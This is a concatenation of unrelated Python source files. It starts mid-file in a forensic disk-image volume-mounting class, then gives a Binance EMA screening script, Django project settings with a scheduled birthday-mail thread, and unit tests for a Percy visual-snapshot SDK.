return tuple([int(x) for x in self.index.split(".")])
except ValueError:
return ()
@property
def fstype(self):
warnings.warn("fstype is deprecated in favor of filesystem", DeprecationWarning)
return self.filesystem
def _get_fstype_from_parser(self, fstype=None):
"""Load fstype information from the parser instance."""
if not fstype:
if self.index in self.disk.parser.fstypes:
fstype = self.disk.parser.fstypes[self.index]
elif '*' in self.disk.parser.fstypes:
fstype = self.disk.parser.fstypes['*']
elif '?' in self.disk.parser.fstypes and self.disk.parser.fstypes['?'] is not None:
fstype = "?" + self.disk.parser.fstypes['?']
else:
fstype = ""
if not fstype:
self.filesystem = None
elif fstype in VOLUME_SYSTEM_TYPES:
self.volumes.vstype = fstype
self.filesystem = FILE_SYSTEM_TYPES["volumesystem"](self)
elif fstype.startswith("?"):
fallback = FILE_SYSTEM_TYPES[fstype[1:]](self)
self.filesystem = filesystems.FallbackFileSystem(self, fallback)
else:
self.filesystem = FILE_SYSTEM_TYPES[fstype](self)
def get_description(self, with_size=True, with_index=True):
"""Obtains a generic description of the volume, containing the file system type, index, label and NTFS version.
If *with_size* is provided, the volume size is also included.
"""
desc = ''
if with_size and self.size:
desc += '{0} '.format(self.get_formatted_size())
s = self.info.get('statfstype') or self.info.get('fsdescription') or '-'
if with_index:
desc += '{1}:{0}'.format(s, self.index)
else:
desc += s
if self.info.get('label'):
desc += ' {0}'.format(self.info.get('label'))
if self.info.get('version'): # NTFS
desc += ' [{0}]'.format(self.info.get('version'))
return desc
def get_formatted_size(self):
"""Obtains the size of the volume in a human-readable format (i.e. in TiBs, GiBs or MiBs)."""
if self.size is not None:
if self.size < 1024:
return "{0} B".format(self.size)
elif self.size < 1024 ** 2:
return "{0} KiB".format(round(self.size / 1024, 2))
elif self.size < 1024 ** 3:
return "{0} MiB".format(round(self.size / 1024 ** 2, 2))
elif self.size < 1024 ** 4:
return "{0} GiB".format(round(self.size / 1024 ** 3, 2))
else:
return "{0} TiB".format(round(self.size / 1024 ** 4, 2))
else:
return self.size
@dependencies.require(dependencies.blkid, none_on_failure=True)
def _get_blkid_type(self):
"""Retrieves the FS type from the blkid command."""
try:
result = _util.check_output_(['blkid', '-p', '-O', str(self.offset), self.get_raw_path()])
if not result:
return None
# noinspection PyTypeChecker
blkid_result = dict(re.findall(r'([A-Z]+)="(.+?)"', result))
self.info['blkid_data'] = blkid_result
if 'PTTYPE' in blkid_result and 'TYPE' not in blkid_result:
return blkid_result.get('PTTYPE')
else:
return blkid_result.get('TYPE')
except Exception:
return None # returning None is better here, since we do not care about the exception in determine_fs_type
@dependencies.require(dependencies.magic, none_on_failure=True)
def _get_magic_type(self):
"""Checks the volume for its magic bytes and returns the magic."""
try:
with io.open(self.disk.get_fs_path(), "rb") as file:
file.seek(self.offset)
fheader = file.read(min(self.size, 4096) if self.size else 4096)
except IOError:
logger.exception("Failed reading first 4K bytes from volume.")
return None
# TODO fallback to img-cat image -s blocknum | file -
# if we were able to load the module magic
try:
# noinspection PyUnresolvedReferences
import magic
if hasattr(magic, 'from_buffer'):
# using https://github.com/ahupp/python-magic
logger.debug("Using python-magic Python package for file type magic")
result = magic.from_buffer(fheader).decode()
self.info['magic_data'] = result
return result
elif hasattr(magic, 'open'):
# using Magic file extensions by Rueben Thomas (Ubuntu python-magic module)
logger.debug("Using python-magic system package for file type magic")
ms = magic.open(magic.NONE)
ms.load()
result = ms.buffer(fheader)
ms.close()
self.info['magic_data'] = result
return result
else:
logger.warning("The python-magic module is not available, but another module named magic was found.")
except ImportError:
logger.warning("The python-magic module is not available.")
except AttributeError:
logger.warning("The python-magic module is not available, but another module named magic was found.")
return None # returning None is better here, since we do not care about the exception in determine_fs_type
def get_raw_path(self, include_self=False):
"""Retrieves the base mount path of the volume. Typically equals to :func:`Disk.get_fs_path` but may also be the
path to a logical volume. This is used to determine the source path for a mount call.
The value returned is normally based on the parent's paths, e.g. if this volume is mounted to a more specific
path, only its children return the more specific path, this volume itself will keep returning the same path.
This makes for consistent use of the offset attribute. If you do not need this behaviour, you can override this
with the include_self argument.
This behavior, however, is not retained for paths that directly affect the volume itself, not the child volumes.
This includes VSS stores and LV volumes.
"""
v = self
if not include_self:
# lv / vss_store are exceptions, as it covers the volume itself, not the child volume
if v._paths.get('lv'):
return v._paths['lv']
elif v._paths.get('vss_store'):
return v._paths['vss_store']
elif v.parent and v.parent != self.disk:
v = v.parent
else:
return self.disk.get_fs_path()
while True:
if v._paths.get('lv'):
return v._paths['lv']
elif v._paths.get('bde'):
return v._paths['bde'] + '/bde1'
elif v._paths.get('luks'):
return '/dev/mapper/' + v._paths['luks']
elif v._paths.get('md'):
return v._paths['md']
elif v._paths.get('vss_store'):
return v._paths['vss_store']
# Only if the volume has a parent that is not a disk, we try to check the parent for a location.
if v.parent and v.parent != self.disk:
v = v.parent
else:
break
return self.disk.get_fs_path()
def get_safe_label(self):
"""Returns a label that is safe to add to a path in the mountpoint for this volume."""
if self.info.get('label') == '/':
return 'root'
suffix = re.sub(r"[/ \(\)]+", "_", self.info.get('label')) if self.info.get('label') else ""
if suffix and suffix[0] == '_':
suffix = suffix[1:]
if len(suffix) > 2 and suffix[-1] == '_':
suffix = suffix[:-1]
return suffix
@dependencies.require(dependencies.photorec)
def carve(self, freespace=True):
"""Call this method to carve the free space of the volume for (deleted) files. Note that photorec has its
own interface that temporarily takes over the shell.
:param freespace: indicates whether the entire volume should be carved (False) or only the free space (True)
:type freespace: bool
:return: string to the path where carved data is available
:raises CommandNotFoundError: if the underlying command does not exist
:raises SubsystemError: if the underlying command fails
:raises NoMountpointAvailableError: if there is no mountpoint available
:raises NoLoopbackAvailableError: if there is no loopback available (only when volume has no slot number)
"""
self._paths['carve'] = self._make_mountpoint(suffix="carve")
# if no slot, we need to make a loopback that we can use to carve the volume
loopback_was_created_for_carving = False
if not self.slot:
if not self.loopback:
self._find_loopback()
# Can't carve if volume has no slot number and can't be mounted on loopback.
loopback_was_created_for_carving = True
# noinspection PyBroadException
try:
_util.check_call_(["photorec", "/d", self._paths['carve'] + os.sep, "/cmd", self.loopback,
("freespace," if freespace else "") + "search"])
# clean out the loop device if we created it specifically for carving
if loopback_was_created_for_carving:
# noinspection PyBroadException
try:
_util.check_call_(['losetup', '-d', self.loopback])
except Exception:
pass
else:
self.loopback = ""
return self._paths['carve']
except Exception as e:
logger.exception("Failed carving the volume.")
raise SubsystemError(e)
else:
# noinspection PyBroadException
try:
_util.check_call_(["photorec", "/d", self._paths['carve'] + os.sep, "/cmd", self.get_raw_path(),
str(self.slot) + (",freespace" if freespace else "") + ",search"])
return self._paths['carve']
except Exception as e:
logger.exception("Failed carving the volume.")
raise SubsystemError(e)
@dependencies.require(dependencies.vshadowmount)
def detect_volume_shadow_copies(self):
"""Method to call vshadowmount and mount NTFS volume shadow copies.
:return: iterable with the :class:`Volume` objects of the VSS
:raises CommandNotFoundError: if the underlying command does not exist
:raises SubSystemError: if the underlying command fails
:raises NoMountpointAvailableError: if there is no mountpoint available
"""
self._paths['vss'] = self._make_mountpoint(suffix="vss")
try:
_util.check_call_(["vshadowmount", "-o", str(self.offset), self.get_raw_path(), self._paths['vss']])
except Exception as e:
logger.exception("Failed mounting the volume shadow copies.")
raise SubsystemError(e)
else:
return self.volumes.detect_volumes(vstype='vss')
def _should_mount(self, only_mount=None, skip_mount=None):
"""Indicates whether this volume should be mounted. Internal method, used by imount.py"""
om = only_mount is None \
or self.index in only_mount \
or self.info.get('lastmountpoint') in only_mount \
or self.info.get('label') in only_mount
sm = skip_mount is None \
or (self.index not in skip_mount
and self.info.get('lastmountpoint') not in skip_mount
and self.info.get('label') not in skip_mount)
return om and sm
def init(self, only_mount=None, skip_mount=None, swallow_exceptions=True):
"""Generator that mounts this volume and either yields itself or recursively generates its subvolumes.
More specifically, this function will call :func:`load_fsstat_data` (iff *no_stats* is False), followed by
:func:`mount`, followed by a call to :func:`detect_mountpoint`, after which ``self`` is yielded, or the result
of the :func:`init` call on each subvolume is yielded
:param only_mount: if specified, only volume indexes in this list are mounted. Volume indexes are strings.
:param skip_mount: if specified, volume indexes in this list are not mounted.
        :param swallow_exceptions: if True, any error occurring when mounting the volume is swallowed and added as an
exception attribute to the yielded objects.
"""
if swallow_exceptions:
self.exception = None
try:
if not self._should_mount(only_mount, skip_mount):
yield self
return
if not self.init_volume():
yield self
return
except ImageMounterError as e:
if swallow_exceptions:
self.exception = e
else:
raise
if not self.volumes:
yield self
else:
for v in self.volumes:
yield from v.init(only_mount, skip_mount, swallow_exceptions)
def init_volume(self):
"""Initializes a single volume. You should use this method instead of :func:`mount` if you want some sane checks
before mounting.
"""
logger.debug("Initializing volume {0}".format(self))
if not self._should_mount():
return False
if self.flag != 'alloc':
return False
if self.info.get('raid_status') == 'waiting':
logger.info("RAID array %s not ready for mounting", self)
return False
if self.is_mounted:
logger.info("%s is currently mounted, not mounting it again", self)
return False
logger.info("Mounting volume {0}".format(self))
self.mount()
self.detect_mountpoint()
return True
def _make_mountpoint(self, casename=None, suffix=''):
"""Creates a directory that can be used as a mountpoint.
:returns: the mountpoint path
:raises NoMountpointAvailableError: if no mountpoint could be made
"""
parser = self.disk.parser
if parser.mountdir and not os.path.exists(parser.mountdir):
os.makedirs(parser.mountdir)
if parser.pretty:
md = parser.mountdir or tempfile.gettempdir()
case_name = casename or self.disk.parser.casename or \
".".join(os.path.basename(self.disk.paths[0]).split('.')[0:-1]) or \
os.path.basename(self.disk.paths[0])
fstype = self.filesystem.type if self.filesystem is not None else None
if self.disk.parser.casename == case_name: # the casename is already in the path in this case
pretty_label = "{0}-{1}".format(self.index, self.get_safe_label() or fstype or 'volume')
else:
pretty_label = "{0}-{1}-{2}".format(case_name, self.index,
self.get_safe_label() or fstype or 'volume')
if suffix:
pretty_label += "-" + suffix
path = os.path.join(md, pretty_label)
# check if path already exists, otherwise try to find another nice path
if os.path.exists(path):
for i in range(2, 100):
path = os.path.join(md, pretty_label + "-" + str(i))
if not os.path.exists(path):
break
else:
logger.error("Could not find free mountdir.")
raise NoMountpointAvailableError()
# noinspection PyBroadException
try:
os.mkdir(path, 777)
return path
except Exception:
logger.exception("Could not create mountdir.")
raise NoMountpointAvailableError()
else:
t = tempfile.mkdtemp(prefix='im_' + self.index + '_',
suffix='_' + self.get_safe_label() + ("_" + suffix if suffix else ""),
dir=parser.mountdir)
return t
def _clear_mountpoint(self):
"""Clears a created mountpoint. Does not unmount it, merely deletes it."""
if self.mountpoint:
os.rmdir(self.mountpoint)
self.mountpoint = ""
def _find_loopback(self, use_loopback=True, var_name='loopback'):
"""Finds a free loopback device that can be used. The loopback is stored in :attr:`loopback`. If *use_loopback*
is True, the loopback will also be used directly.
:returns: the loopback address
:raises NoLoopbackAvailableError: if no loopback could be found
"""
# noinspection PyBroadException
try:
loopback = _util.check_output_(['losetup', '-f']).strip()
setattr(self, var_name, loopback)
except Exception:
logger.warning("No free loopback device found.", exc_info=True)
raise NoLoopbackAvailableError()
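        # losetup -o <offset> --sizelimit <size> exposes only this volume's byte
        # range of the raw image through the loop device found above; "-r" is added
        # when the disk was not opened read-write.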
# noinspection PyBroadException
if use_loopback:
try:
cmd = ['losetup', '-o', str(self.offset), '--sizelimit', str(self.size),
loopback, self.get_raw_path()]
if not self.disk.read_write:
cmd.insert(1, '-r')
_util.check_call_(cmd, stdout=subprocess.PIPE)
except Exception:
logger.exception("Loopback device could not be mounted.")
raise NoLoopbackAvailableError()
return loopback
def _free_loopback(self, var_name='loopback'):
if getattr(self, var_name):
_util.check_call_(['losetup', '-d', getattr(self, var_name)], wrap_error=True)
setattr(self, var_name, "")
def determine_fs_type(self):
"""Determines the FS type for this partition. This function is used internally to determine which mount system
to use, based on the file system description. Return values include *ext*, *ufs*, *ntfs*, *lvm* and *luks*.
Note: does not do anything if fstype is already set to something sensible.
"""
fstype_fallback = None
if isinstance(self.filesystem, filesystems.FallbackFileSystem):
fstype_fallback = self.filesystem.fallback
elif isinstance(self.filesystem, filesystems.FileSystem):
return self.filesystem
result = collections.Counter()
for source, description in (('fsdescription', self.info.get('fsdescription')),
('guid', self.info.get('guid')),
('blikid', self._get_blkid_type),
('magic', self._get_magic_type)):
# For efficiency reasons, not all functions are called instantly.
if callable(description):
description = description()
logger.debug("Trying to determine fs type from {} '{}'".format(source, description))
if not description:
continue
# Iterate over all results and update the certainty of all FS types
for type in FILE_SYSTEM_TYPES.values():
result.update(type.detect(source, description))
# Now sort the results by their certainty
logger.debug("Current certainty levels: {}".format(result))
# If we have not found any candidates, we continue
if not result:
continue
# If we have candidates of which we are not entirely certain, we just continue
max_res = result.most_common(1)[0][1]
if max_res < 50:
logger.debug("Highest certainty item is lower than 50, continuing...")
# If we have multiple candidates with the same score, we just continue
elif len([True for type, certainty in result.items() if certainty == max_res]) > 1:
logger.debug("Multiple items with highest certainty level, so continuing...")
else:
self.filesystem = result.most_common(1)[0][0](self)
return self.filesystem
# Now be more lax with the fallback:
if result:
max_res = result.most_common(1)[0][1]
if max_res > 0:
self.filesystem = result.most_common(1)[0][0](self)
return self.filesystem
if fstype_fallback:
self.filesystem = fstype_fallback
return self.filesystem
def mount(self):
"""Based on the file system type as determined by :func:`determine_fs_type`, the proper mount command is executed
for this volume. The volume is mounted in a temporary path (or a pretty path if :attr:`pretty` is enabled) in
the mountpoint as specified by :attr:`mountpoint`.
If the file system type is a LUKS container or LVM, additional methods may be called, adding subvolumes to
:attr:`volumes`
:raises NotMountedError: if the parent volume/disk is not mounted
:raises NoMountpointAvailableError: if no mountpoint was found
:raises NoLoopbackAvailableError: if no loopback device was found
:raises UnsupportedFilesystemError: if the fstype is not supported for mounting
:raises SubsystemError: if one of the underlying commands failed
"""
if not self.parent.is_mounted:
raise NotMountedError(self.parent)
self.filesystem = self.determine_fs_type()
self._load_fsstat_data()
# Prepare mount command
try:
self.filesystem.mount()
self.was_mounted = True
self.is_mounted = True
except Exception as e:
logger.exception("Execution failed due to {} {}".format(type(e), e), exc_info=True)
if not isinstance(e, ImageMounterError):
raise SubsystemError(e)
else:
raise
def bindmount(self, mountpoint):
"""Bind mounts the volume to another mountpoint. Only works if the volume is already mounted.
:raises NotMountedError: when the volume is not yet mounted
:raises SubsystemError: when the underlying command failed
"""
if not self.mountpoint:
raise NotMountedError(self)
try:
_util.check_call_(['mount', '--bind', self.mountpoint, mountpoint], stdout=subprocess.PIPE)
if 'bindmounts' in self._paths:
self._paths['bindmounts'].append(mountpoint)
else:
self._paths['bindmounts'] = [mountpoint]
return True
except Exception as e:
logger.exception("Error bind mounting {0}.".format(self))
raise SubsystemError(e)
def get_volumes(self):
"""Recursively gets a list of all subvolumes and the current volume."""
if self.volumes:
volumes = []
for v in self.volumes:
volumes.extend(v.get_volumes())
volumes.append(self)
return volumes
else:
return [self]
@dependencies.require(dependencies.fsstat, none_on_failure=True)
def _load_fsstat_data(self, timeout=3):
"""Using :command:`fsstat`, adds some additional information of the volume to the Volume."""
def stats_thread():
try:
cmd = ['fsstat', self.get_raw_path(), '-o', str(self.offset // self.disk.block_size)]
# Setting the fstype explicitly makes fsstat much faster and more reliable
# In some versions, the auto-detect yaffs2 check takes ages for large images
fstype = {
"ntfs": "ntfs", "fat": "fat", "ext": "ext", "iso": "iso9660", "hfs+": "hfs",
"ufs": "ufs", "swap": "swap", "exfat": "exfat",
}.get(self.filesystem.type, None)
if fstype:
cmd.extend(["-f", fstype])
logger.debug('$ {0}'.format(' '.join(cmd)))
stats_thread.process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
for line in iter(stats_thread.process.stdout.readline, b''):
line = line.decode('utf-8')
logger.debug('< {0}'.format(line))
if line.startswith("File System Type:"):
self.info['statfstype'] = line[line.index(':') + 2:].strip()
elif line.startswith("Last Mount Point:") or line.startswith("Last mounted on:"):
self.info['lastmountpoint'] = line[line.index(':') + 2:].strip().replace("//", "/")
elif line.startswith("Volume Name:") and not self.info.get('label'):
self.info['label'] = line[line.index(':') + 2:].strip()
elif line.startswith("Version:"):
self.info['version'] = line[line.index(':') + 2:].strip()
elif line.startswith("Source OS:"):
self.info['version'] = line[line.index(':') + 2:].strip()
elif 'CYLINDER GROUP INFORMATION' in line or 'BLOCK GROUP INFORMATION' in line:
# noinspection PyBroadException
try:
stats_thread.process.terminate()
logger.debug("Terminated fsstat at cylinder/block group information.")
except Exception:
pass
break
if self.info.get('lastmountpoint') and self.info.get('label'):
self.info['label'] = "{0} ({1})".format(self.info['lastmountpoint'], self.info['label'])
elif self.info.get('lastmountpoint') and not self.info.get('label'):
self.info['label'] = self.info['lastmountpoint']
elif not self.info.get('lastmountpoint') and self.info.get('label') and \
self.info['label'].startswith("/"): # e.g. /boot1
if self.info['label'].endswith("1"):
self.info['lastmountpoint'] = self.info['label'][:-1]
else:
self.info['lastmountpoint'] = self.info['label']
except Exception: # ignore any exceptions here.
logger.exception("Error while obtaining stats.")
stats_thread.process = None
thread = threading.Thread(target=stats_thread)
thread.start()
thread.join(timeout)
if thread.is_alive():
# noinspection PyBroadException
try:
stats_thread.process.terminate()
except Exception:
pass
thread.join()
logger.debug("Killed fsstat after {0}s".format(timeout))
def detect_mountpoint(self):
"""Attempts to detect the previous mountpoint if this was not done through :func:`load_fsstat_data`. This
detection does some heuristic method on the mounted volume.
"""
if self.info.get('lastmountpoint'):
return self.info.get('lastmountpoint')
if not self.mountpoint:
return None
result = None
paths = os.listdir(self.mountpoint)
if 'grub' in paths:
result = '/boot'
elif 'usr' in paths and 'var' in paths and 'root' in paths:
result = '/'
elif 'bin' in paths and 'lib' in paths and 'local' in paths and 'src' in paths and 'usr' not in paths:
result = '/usr'
elif 'bin' in paths and 'lib' in paths and 'local' not in paths and 'src' in paths and 'usr' not in paths:
result = '/usr/local'
elif 'lib' in paths and 'local' in paths and 'tmp' in paths and 'var' not in paths:
result = '/var'
# elif sum(['bin' in paths, 'boot' in paths, 'cdrom' in paths, 'dev' in paths, 'etc' in paths, 'home' in paths,
# 'lib' in paths, 'lib64' in paths, 'media' in paths, 'mnt' in paths, 'opt' in paths,
# 'proc' in paths, 'root' in paths, 'sbin' in paths, 'srv' in paths, 'sys' in paths, 'tmp' in paths,
# 'usr' in paths, 'var' in paths]) > 11:
# result = '/'
if result:
self.info['lastmountpoint'] = result
if not self.info.get('label'):
self.info['label'] = self.info['lastmountpoint']
logger.info("Detected mountpoint as {0} based on files in volume".format(self.info['lastmountpoint']))
return result
# noinspection PyBroadException
def unmount(self, allow_lazy=False):
"""Unounts the volume from the filesystem.
:raises SubsystemError: if one of the underlying processes fails
:raises CleanupError: if the cleanup fails
"""
for volume in self.volumes:
try:
volume.unmount(allow_lazy=allow_lazy)
except ImageMounterError:
pass
if self.is_mounted:
logger.info("Unmounting volume %s", self)
if self._paths.get('vss'):
try:
_util.clean_unmount(['fusermount', '-u'], self._paths['vss'])
except SubsystemError:
if not allow_lazy:
raise
_util.clean_unmount(['fusermount', '-uz'], self._paths['vss'])
del self._paths['vss']
if self._paths.get('bindmounts'):
for mp in self._paths['bindmounts']:
_util.clean_unmount(['umount'], mp, rmdir=False)
del self._paths['bindmounts']
if self._paths.get('carve'):
try:
shutil.rmtree(self._paths['carve'])
except OSError as e:
raise SubsystemError(e)
else:
del self._paths['carve']
self.filesystem.unmount(allow_lazy=allow_lazy)
self.is_mounted = False
|
binance_pairs_ema.py
|
import requests
import json
import os
import time
from threading import Thread
from bfxhfindicators import EMA
BASE_URL = 'https://api.binance.com'
TIMEFRAME = '15m'
EMA_PERIODS = [96, 288]
symbols = []
candles = {}
prices = {}
ema_values = {}
def load_candles(sym):
global candles, prices, BASE_URL
payload = {
'symbol': sym,
'interval': '15m',
'limit': 250
}
resp = requests.get(BASE_URL + '/api/v3/klines', params=payload)
klines = json.loads(resp.content)
# parse klines and store open, high, low, close and vol only
parsed_klines = []
for k in klines:
k_candle = {
'open': float(k[1]),
'high': float(k[2]),
'low': float(k[3]),
'close': float(k[4]),
'vol': float(k[5])
}
parsed_klines.append(k_candle)
candles[sym] = parsed_klines
index = len(parsed_klines) - 1 # get index of latest candle
prices[sym] = parsed_klines[index]['close'] # save current price
# create results folder if it doesn't exist
if not os.path.exists('results/'):
os.makedirs('results/')
# start with blank files
open('results/good.txt', 'w').close()
open('results/bad.txt', 'w').close()
# load symbols information
print('Getting list of USDT trade pairs...')
resp = requests.get(BASE_URL + '/api/v3/ticker/bookTicker')
tickers_list = json.loads(resp.content)
for ticker in tickers_list:
if str(ticker['symbol'])[-4:] == 'USDT':
symbols.append(ticker['symbol'])
# get 15m candles for symbols
print('Loading candle data for symbols...')
for sym in symbols:
Thread(target=load_candles, args=(sym,)).start()
while len(candles) < len(symbols):
print('%s/%s loaded' %(len(candles), len(symbols)), end='\r', flush=True)
time.sleep(0.1)
# calculate EMAs for each symbol
print('Calculating EMAs...')
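# EMA recurrence: EMA_t = a * close_t + (1 - a) * EMA_(t-1), with the usual
# smoothing factor a = 2 / (period + 1). Feeding every cached close into the
# bfxhfindicators EMA and reading .v() gives the latest 96- and 288-period values.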
for sym in candles:
for period in EMA_PERIODS:
iEMA = EMA(period)
lst_candles = candles[sym][:]
for c in lst_candles:
iEMA.add(c['close'])
if sym not in ema_values:
ema_values[sym] = {}
ema_values[sym][period] = iEMA.v()
# save filtered EMA results in txt files
print('Saving filtered EMA results to txt files...')
for sym in ema_values:
    ema_96 = ema_values[sym][96]
    ema_288 = ema_values[sym][288]
    price = prices[sym]
    # strip the 4-character 'USDT' suffix so only the base asset is written out
    #entry = '%s: $%s\n' %(sym, round(price,3))
    entry = sym[:-4]
    if (ema_96 < price < ema_288) or price > ema_288:
        # between the two EMAs (above 96, below 288) or above the 288 EMA: good symbol
        with open('results/good.txt', 'a') as f:
            f.write(entry + '\n')
    elif price < ema_96 and price < ema_288:
        # below both EMAs: bad symbol
        with open('results/bad.txt', 'a') as f:
            f.write(entry + '\n')
print('All done! Results saved in results folder.')
|
settings_20210906111013.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# schedule.every().day.at("11:00").do(decrease_day_count_and_send_bday_mails)
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON STARTS////////////////////
# Schedule the task at 00:01 everyday
schedule.every().day.at("11:11").do(decrease_day_count_and_send_bday_mails)
# schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise)
def func():
while True:
# print("======Runnning==========")
schedule.run_pending()
time.sleep(1)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
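# Note: t1 is a regular (non-daemon) thread, so the scheduler loop above keeps
# running, and keeps the interpreter alive, for as long as this settings module
# stays loaded in the server process.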
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
test_snapshot.py
|
import unittest
from unittest.mock import patch
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
import httpretty
from selenium.webdriver import Firefox, FirefoxOptions
from percy import percy_snapshot, percySnapshot
import percy.snapshot as local
LABEL = local.LABEL
# mock a simple webpage to snapshot
class MockServerRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(('Snapshot Me').encode('utf-8'))
def log_message(self, format, *args):
return
# daemon threads automatically shut down when the main process exits
mock_server = HTTPServer(('localhost', 8000), MockServerRequestHandler)
mock_server_thread = Thread(target=mock_server.serve_forever)
mock_server_thread.setDaemon(True)
mock_server_thread.start()
# mock helpers
def mock_healthcheck(fail=False, fail_how='error'):
health_body = '{ "success": true }'
health_headers = { 'X-Percy-Core-Version': '1.0.0' }
health_status = 200
if fail and fail_how == 'error':
health_body = '{ "success": false, "error": "test" }'
health_status = 500
elif fail and fail_how == 'wrong-version':
health_headers = { 'X-Percy-Core-Version': '2.0.0' }
elif fail and fail_how == 'no-version':
health_headers = {}
httpretty.register_uri(
httpretty.GET, 'http://localhost:5338/percy/healthcheck',
body=health_body,
adding_headers=health_headers,
status=health_status)
httpretty.register_uri(
httpretty.GET, 'http://localhost:5338/percy/dom.js',
body='window.PercyDOM = { serialize: () => document.documentElement.outerHTML };',
status=200)
def mock_snapshot(fail=False):
httpretty.register_uri(
httpretty.POST, 'http://localhost:5338/percy/snapshot',
body=('{ "success": ' + ('true' if not fail else 'false, "error": "test"') + '}'),
status=(500 if fail else 200))
class TestPercySnapshot(unittest.TestCase):
@classmethod
def setUpClass(cls):
options = FirefoxOptions()
options.add_argument('-headless')
cls.driver = Firefox(options=options)
@classmethod
def tearDownClass(cls):
cls.driver.quit()
def setUp(self):
# clear the cached value for testing
local.is_percy_enabled.cache_clear()
local.fetch_percy_dom.cache_clear()
self.driver.get('http://localhost:8000')
httpretty.enable()
def tearDown(self):
httpretty.disable()
httpretty.reset()
def test_throws_error_when_a_driver_is_not_provided(self):
with self.assertRaises(Exception):
percy_snapshot()
def test_throws_error_when_a_name_is_not_provided(self):
with self.assertRaises(Exception):
percy_snapshot(self.driver)
def test_disables_snapshots_when_the_healthcheck_fails(self):
mock_healthcheck(fail=True)
with patch('builtins.print') as mock_print:
percy_snapshot(self.driver, 'Snapshot 1')
percy_snapshot(self.driver, 'Snapshot 2')
mock_print.assert_called_with(f'{LABEL} Percy is not running, disabling snapshots')
self.assertEqual(httpretty.last_request().path, '/percy/healthcheck')
def test_disables_snapshots_when_the_healthcheck_errors(self):
# no mocks will cause the request to throw an error
with patch('builtins.print') as mock_print:
percy_snapshot(self.driver, 'Snapshot 1')
percy_snapshot(self.driver, 'Snapshot 2')
mock_print.assert_called_with(f'{LABEL} Percy is not running, disabling snapshots')
self.assertEqual(len(httpretty.latest_requests()), 0)
def test_disables_snapshots_when_the_healthcheck_version_is_wrong(self):
mock_healthcheck(fail=True, fail_how='wrong-version')
with patch('builtins.print') as mock_print:
percy_snapshot(self.driver, 'Snapshot 1')
percy_snapshot(self.driver, 'Snapshot 2')
mock_print.assert_called_with(f'{LABEL} Unsupported Percy CLI version, 2.0.0')
self.assertEqual(httpretty.last_request().path, '/percy/healthcheck')
def test_disables_snapshots_when_the_healthcheck_version_is_missing(self):
mock_healthcheck(fail=True, fail_how='no-version')
with patch('builtins.print') as mock_print:
percy_snapshot(self.driver, 'Snapshot 1')
percy_snapshot(self.driver, 'Snapshot 2')
mock_print.assert_called_with(
f'{LABEL} You may be using @percy/agent which is no longer supported by this SDK. '
'Please uninstall @percy/agent and install @percy/cli instead. '
'https://docs.percy.io/docs/migrating-to-percy-cli')
self.assertEqual(httpretty.last_request().path, '/percy/healthcheck')
def test_posts_snapshots_to_the_local_percy_server(self):
mock_healthcheck()
mock_snapshot()
percy_snapshot(self.driver, 'Snapshot 1')
percy_snapshot(self.driver, 'Snapshot 2', enable_javascript=True)
self.assertEqual(httpretty.last_request().path, '/percy/snapshot')
